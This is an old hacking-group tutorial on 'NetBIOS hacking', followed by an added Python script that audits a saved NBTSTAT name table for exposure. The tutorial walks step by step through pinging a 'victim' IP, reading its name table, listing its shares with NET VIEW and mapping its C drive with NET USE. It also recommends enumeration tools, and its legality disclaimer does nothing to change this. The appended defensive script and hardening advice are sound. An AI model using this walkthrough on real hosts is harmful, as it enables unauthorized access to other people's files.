-=[ # C C P O W E R ]=-   (at mIRC DALnet)
www.CCpower.net
Made By: GSD

NetBIOS Hacking

Q: What is NetBIOS?
A: NetBIOS stands for "Network Basic Input Output System" and is a way for
   computers in a network (LAN or WAN) to share files and printers. (It has
   many other uses as well, but they are beyond the scope of this tutorial.)

Q: How is this interesting to me?
A: As you now know, it is used to share files. This can be exploited. Many
   people share their entire hard drive without even knowing it. Most of the
   time, these "shares" will not be password protected.

Q: Can I access these files from my own computer, you mean?
A: Sure. That is what this tutorial is all about.

Q: How?
A: If you have Windows installed, you already have all the tools you need to
   access remote shares.

Q: Can you show me?
A: Sure.

================================================================

C:\windows>     <--- this is what your terminal looks like when you
                     initiate the attack.

I could start talking about finding IPs too, but that would be off topic, so
you are going to have to read another tutorial on that if you don't know it.
Let's just say the victim's IP is 123.123.123.123.

Now... let's make sure the host is there.

C:\windows>PING 123.123.123.123

What you want to see then is:

Reply from 123.123.123.123: bytes=32 time<1ms TTL=128

WE NOW KNOW TARGET IS ONLINE.
-----------------------------------------------------------------

Next step is to see if the target is sharing anything:

C:\windows>NBTSTAT -a 123.123.123.123

Name               Type         Status
---------------------------------------------
L337           <00>  UNIQUE      Registered
NSDAP          <00>  GROUP       Registered
L337           <03>  UNIQUE      Registered
L337           <20>  UNIQUE      Registered
NSDAP          <1E>  GROUP       Registered
STEALTHWASP    <03>  UNIQUE      Registered
NSDAP          <1D>  UNIQUE      Registered

What does this tell us?

L337 is the computer name.
NSDAP is the name of the workgroup.
STEALTHWASP is the currently logged-in user.

BUT there is some even more valuable information there. Do you see the <20>
on the 4th line? That means the victim has file sharing enabled. If there was
no <20> there, we could just forget doing the NetBIOS exploit on this target.

-----------------------------------------------------------------

Next step is to see the shares, if any. This may still be a dead end.

C:\windows>NET VIEW \\123.123.123.123

Shared resources on 123.123.123.123

Share name   Type   Comment
--------------------------------------------
C            Disk
D            Disk
Command completed successfully.

NOW WE KNOW THE SHARE NAMES.

-----------------------------------------------------------------

All that remains now is to "MAP" a share...

-----------------------------------------------------------------

C:\windows>NET USE K: \\123.123.123.123\C
Command completed successfully.

CHANGE TO K: IN DOS OR OPEN WINDOWS EXPLORER, AND YOU'RE IN...

================================================================

Commands used in this tutorial:

PING
NBTSTAT -a IP     (123.123.123.123)
NET VIEW \\IP
NET USE K: \\IP\SHARENAME

Programs worth taking a look at: NbtScan, Enum, Legion and PQwak.
These can all easily be found at www.google.com

***THIS IS ILLEGAL TO DO IF YOU DO NOT HAVE PERMISSION FROM THE OWNER OF THE
REMOTE SYSTEM.***
***THIS IS FOR INFORMATIONAL PURPOSE ONLY. STAY LEGAL.***

-----------------------------------------------------------------
( By: StealthWasp )
-----------------------------------------------------------------
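
For an administrator checking their own machines, the NBTSTAT name table above is the place to see what a host discloses: its name, workgroup, logged-in user and whether the <20> file server service is registered. The following is an added example, not part of the original tutorial; it parses a saved name table and reports those items. SAMPLE is the tutorial's table, the function names are illustrative, and the meanings given for <1E> and <1D> are the standard NetBIOS service codes, which the tutorial does not explain.

```python
import re

# Constructed sample: the name table shown in the tutorial above.
SAMPLE = """\
Name               Type         Status
---------------------------------------------
L337           <00>  UNIQUE      Registered
NSDAP          <00>  GROUP       Registered
L337           <03>  UNIQUE      Registered
L337           <20>  UNIQUE      Registered
NSDAP          <1E>  GROUP       Registered
STEALTHWASP    <03>  UNIQUE      Registered
NSDAP          <1D>  UNIQUE      Registered
"""

# Meaning of each (suffix, type) pair that appears in the tutorial's table.
SERVICES = {
    ("00", "UNIQUE"): "workstation service (computer name)",
    ("00", "GROUP"): "workgroup or domain name",
    ("03", "UNIQUE"): "messenger service (computer or user name)",
    ("20", "UNIQUE"): "file server service (sharing enabled)",
    ("1E", "GROUP"): "browser service elections",
    ("1D", "UNIQUE"): "master browser",
}

ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")


def parse_name_table(text):
    """Return (name, suffix, type, status) rows; header and other lines are skipped."""
    matches = (ROW.match(line) for line in text.splitlines())
    return [(m[1], m[2].upper(), m[3], m[4]) for m in matches if m]


def audit(text):
    """Summarise what a host's name table discloses to the network."""
    rows = [r for r in parse_name_table(text) if r[3] == "Registered"]
    computer = [n for n, s, t, _ in rows if (s, t) == ("00", "UNIQUE")]
    return {
        "computer": computer[0] if computer else None,
        "workgroup": next((n for n, s, t, _ in rows if (s, t) == ("00", "GROUP")), None),
        # <03> names other than the computer name are logged-in users.
        "users": [n for n, s, t, _ in rows if s == "03" and n not in computer],
        "file_sharing": any(s == "20" for _, s, _, _ in rows),
        "unknown": [(n, s, t) for n, s, t, _ in rows if (s, t) not in SERVICES],
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(f"{key}: {value}")
```

A host that reports file_sharing as True and has no need to serve files is a candidate for turning file and printer sharing off, or at least for password-protecting its shares.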